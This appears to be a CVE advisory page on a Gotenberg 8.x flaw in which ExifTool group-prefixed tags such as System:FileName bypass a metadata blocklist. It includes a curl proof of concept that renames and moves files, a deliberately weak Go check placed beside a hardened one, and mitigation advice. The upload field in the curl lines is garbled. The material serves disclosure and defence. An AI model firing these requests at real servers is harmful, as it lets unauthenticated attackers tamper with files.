The vulnerability arises because Gotenberg blocks certain ExifTool tag names (FileName, Directory) with an exact string match, while ExifTool also accepts the group-qualified form of the same tag (`System:FileName`). The input validation regex allows colons, so `System:FileName` passes the regex; the blocklist then compares it with `FileName`, the strings are not equal, and the key is kept. ExifTool treats `System:FileName` as the same tag as `FileName`, so the file is renamed and, with `System:Directory`, moved. No authentication is required: an attacker sends a single HTTP request whose metadata field contains `System:FileName` and `System:Directory`, bypassing the earlier GHSA fix. The same bypass works with `system:FileName`, because ExifTool matches tag names case-insensitively, and with the `FilePermissions` tag, which was never on the blocklist at all and lets the attacker `chmod` the file. All endpoints that accept a `metadata` parameter are affected, including the PDF, HTML, and LibreOffice conversions.
dailycve form:
Platform: Gotenberg
Version: 8.x
Vulnerability: Tag prefix bypass
Severity: Critical
Date: 2026-05-04
Prediction: 2026-05-15
What Undercode Say:
# Run the vulnerable container
docker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8
# Create the target directory inside the container
docker exec gotenberg-poc mkdir -p /tmp/evil
# Exploit: rename and move the file via System:FileName and System:Directory
# (the upload form field is garbled in the source as "[email protected]";
# Gotenberg's multipart endpoints take the input document in the "files" field)
curl -X POST http://localhost:3000/forms/pdfengines/metadata/write \
  -F '[email protected]' \
  -F 'metadata={"System:FileName":"stolen.pdf","System:Directory":"/tmp/evil"}'
# Verify the file was moved
docker exec gotenberg-poc ls -la /tmp/evil/
# Control test: the bare FileName tag is blocked (returns HTTP 500)
curl -X POST http://localhost:3000/forms/pdfengines/metadata/write \
  -F '[email protected]' \
  -F 'metadata={"FileName":"stolen.pdf"}'
Exploit:
Send an HTTP POST request to any metadata-accepting endpoint with JSON containing `System:FileName` (to rename) and `System:Directory` (to move), or `FilePermissions` (to change the file mode). ExifTool carries out the operations; the server then returns 404 because the output file is no longer at the temporary path it expects.
Protection from this CVE:
Upgrade to a patched version (≥8.8.1 if available). Validate metadata keys by normalizing them before the blocklist check: strip every group prefix (split on the colon and take the last component) and compare case-insensitively, or, more strictly, reject any key that contains a colon at all. Add `FilePermissions` to the blocklist. Disable metadata input entirely if it is not needed.
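As an added example that is not Gotenberg's own code, the Go snippet below puts the bypassable exact-match check described at the top of the page beside a normalized check that does what the protection advice asks for: strip group prefixes, compare case-insensitively, and block `FilePermissions`. The regular expression, the function names and the sample request body are assumptions made for the illustration, not Gotenberg's actual implementation.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Constructed stand-in for the metadata-key validation regex: it allows
// letters, digits, underscore, dash and, crucially, the colon that ExifTool
// uses to qualify a tag with a group name. This is an assumption about the
// shape of the check, not Gotenberg's real pattern.
var keyPattern = regexp.MustCompile(`^[A-Za-z0-9_:-]+$`)

// Tags the original blocklist names, compared by exact string match.
var exactBlocklist = []string{"FileName", "Directory"}

// weakIsBlocked reproduces the bypassable logic: the regex passes the colon
// and the blocklist only matches the literal tag name, so "System:FileName",
// "system:FileName" and "FilePermissions" are all forwarded to ExifTool.
func weakIsBlocked(key string) bool {
	if !keyPattern.MatchString(key) {
		return true
	}
	for _, tag := range exactBlocklist {
		if key == tag {
			return true
		}
	}
	return false
}

// hardenedBlocklist holds the same tags plus FilePermissions, lower-cased
// because ExifTool matches tag names case-insensitively.
var hardenedBlocklist = map[string]bool{
	"filename":        true,
	"directory":       true,
	"filepermissions": true,
}

// normalizeTag strips every "Group:" prefix and lower-cases what is left,
// so "System:FileName", "system:filename" and "FileName" all compare equal.
func normalizeTag(key string) string {
	parts := strings.Split(key, ":")
	return strings.ToLower(strings.TrimSpace(parts[len(parts)-1]))
}

// hardenedIsBlocked runs the same regex, then checks the normalized tag.
func hardenedIsBlocked(key string) bool {
	if !keyPattern.MatchString(key) {
		return true
	}
	return hardenedBlocklist[normalizeTag(key)]
}

// filterMetadata returns only the keys a given policy allows; the dropped
// keys are collected so a caller can log them or reject the whole request.
func filterMetadata(meta map[string]string, blocked func(string) bool) (allowed map[string]string, dropped []string) {
	allowed = map[string]string{}
	for k, v := range meta {
		if blocked(k) {
			dropped = append(dropped, k)
			continue
		}
		allowed[k] = v
	}
	return allowed, dropped
}

func main() {
	// Constructed request body, the same shape as the PoC's metadata field.
	payload := map[string]string{
		"Title":            "Quarterly report",
		"System:FileName":  "stolen.pdf",
		"System:Directory": "/tmp/evil",
		"FilePermissions":  "777",
	}
	weakAllowed, _ := filterMetadata(payload, weakIsBlocked)
	hardAllowed, hardDropped := filterMetadata(payload, hardenedIsBlocked)
	fmt.Println("weak check forwards", len(weakAllowed), "of", len(payload), "keys to ExifTool")
	fmt.Println("hardened check forwards", len(hardAllowed), "key(s) and drops", hardDropped)
}
```

Rejecting any key that contains a colon is the simpler fix when group-qualified tags are not a feature you need; the normalizing version above is for deployments that want to keep allowing harmless qualified tags such as `PDF:Title`.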
Impact:
An unauthenticated attacker can move or rename any file Gotenberg processes inside the container, write into shared Docker volumes (affecting other services that mount them), change file permissions, and cause a denial of service (404 errors for the affected requests).
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

